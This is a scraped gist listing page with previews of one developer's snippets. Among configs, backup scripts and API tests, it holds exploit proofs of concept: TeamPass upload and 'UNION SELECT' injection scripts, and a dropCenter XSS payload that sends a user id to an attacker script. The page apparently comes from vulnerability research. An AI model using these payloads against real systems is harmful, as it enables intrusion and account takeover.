Simon Leblanc leblanc-simon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Project name | |
| propel.project = OpenSondage | |
| # Database driver | |
| propel.database = mysql | |
| propel.mysql.tableType = MyISAM | |
| propel.mysql.tableEngineKeyword = ENGINE | |
| propel.tablePrefix = | |
| ################################################# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>Hack TeamPass</title> | |
| </head> | |
| <body> | |
| <form action="http://teampass/includes/libraries/uploadify/uploadify.php" method="post" enctype="multipart/form-data"> | |
| <input type="file" name="Filedata" /> | |
| <input type="hidden" name="type_upload" value="import_items_from_csv" /> | |
| <input type="hidden" name="folder" value="/files" /> | |
| <input type="submit"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $url = 'http://localhost/nilsteampassnet-TeamPass-65f3167/'; | |
| $curl = curl_init(); | |
| curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php'); | |
| curl_setopt($curl, CURLOPT_POST, true); | |
| $post = array( | |
| 'Filedata' => '@info.php', | |
| 'type_upload' => 'import_items_from_csv', | |
| 'folder' => '/nilsteampassnet-TeamPass-65f3167/files', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $url = 'http://localhost/teampass/'; | |
| $curl = curl_init(); | |
| curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php?key_tempo=lol&user_id='.urlencode('0 UNION SELECT \'lol\'')); | |
| curl_setopt($curl, CURLOPT_POST, true); | |
| $post = array( | |
| 'Filedata' => '@info.php', | |
| 'type_upload' => 'import_items_from_csv', | |
| 'folder' => '/teampass/files', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from prestapyt import PrestaShopWebServiceError, PrestaShopWebService, PrestaShopWebServiceDict | |
| prestashop = PrestaShopWebServiceDict('http://localhost/api', '098F6BCD4621D373CADE4E832627B4F6') | |
| prestashop.search('addresses') # 401 + 200 : OK, it's the first call | |
| prestashop.get('addresses', 4) # 200 only: OK | |
| prestashop.get('addresses', 6) # 200 only: OK | |
| prestashop.search('orders') # 401 + 200 : NOK, it must be only 200 | |
| prestashop.get('orders', 2) # 200 only: OK | |
| prestashop.get('orders', 5) # 200 only: OK |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| Usage of API : | |
| - Search / Get links : | |
| * method: GET | |
| * URL : ?do=api (add &token=[hash_hmac(sha256, api_key, api_hash)] to add private link in search) | |
| * return: JSON (object or array) | |
| * &key=[linkdate]: |
leblanc-simon
/ dropcenter_exploit.php
Last active
December 21, 2015 11:49
XSS + privilege escalation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| # Exploit Title: dropCenter all version : privilege escalation | |
| # If this is the last version (after 2013-08-20), use permanent XSS to hack the website : | |
| # | |
| # - Encoded URL : http://localhost/dropCenter/index.php?error=%22%29%3B%24%28document%29.ready%28function%28%29%7B%24%28%27body%27%29.append%28%27%3Cimg+src%3D%22http%3A%2F%2Flocalhost%2Fdropcenter_exploit.php%3Fuser%3D%27%2B%24%28%27form%5Baction%5E%3D%22php%2Faction.php%3Faction%3DsaveSettings%22%5D%27%29.attr%28%27action%27%29.match%28%2Fuser%3D%28.%2A%29%2F%29%5B1%5D%2B%27%22%2F%3E%27%29%7D%29%3Bfunction+test%28%29%7B%7Dtest%28%22 | |
| # | |
| # - Decoded URL : http://localhost/dropCenter/index.php?error=");$(document).ready(function(){$('body').append('<img src="http://localhost/dropcenter_exploit.php?user='+$('form[action^="php/action.php?action=saveSettings"]').attr('action').match(/user=(.*)/)[1]+'"/>')});function test(){}test(" | |
| # | |
| # Date: 2013-08-02 | |
| # Author: leviathan |
leblanc-simon
/ backup_manthly.sh
Created
February 6, 2014 00:49
Backup monthly the last BackupPC dump
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| hosts="host1 host2 host3" | |
| shares="home etc root" | |
| base_path="/home/backup/" | |
| month=`date +%m` | |
| command_tar='sudo -u backuppc /usr/share/backuppc/bin/BackupPC_tarCreate -h %host% -n -1 -s /%share% . > ' | |
| for host in ${hosts}; do |
leblanc-simon
/ check_integrity.sh
Created
February 8, 2014 01:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| directory="/var/www/" | |
| result="${directory}website-integrity/`date '+%Y-%m-%d'`.md5sum" | |
| old_result="${directory}website-integrity/`date '+%Y-%m-%d' --date '1 days ago'`.md5sum" | |
| website_directory="${directory}httpdocs/" | |
| find ${website_directory} -type f -exec md5sum {} \; > ${result} | |
| today=`md5sum ${result} | awk '{print $1}'` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| header("Cache-Control: no-cache, must-revalidate"); | |
| header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); | |
| /** | |
| * @see https://gist.github.com/cballou/2201933 | |
| */ | |
| function getIp() | |
| { | |
| $ip_keys = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR'); |
OlderNewer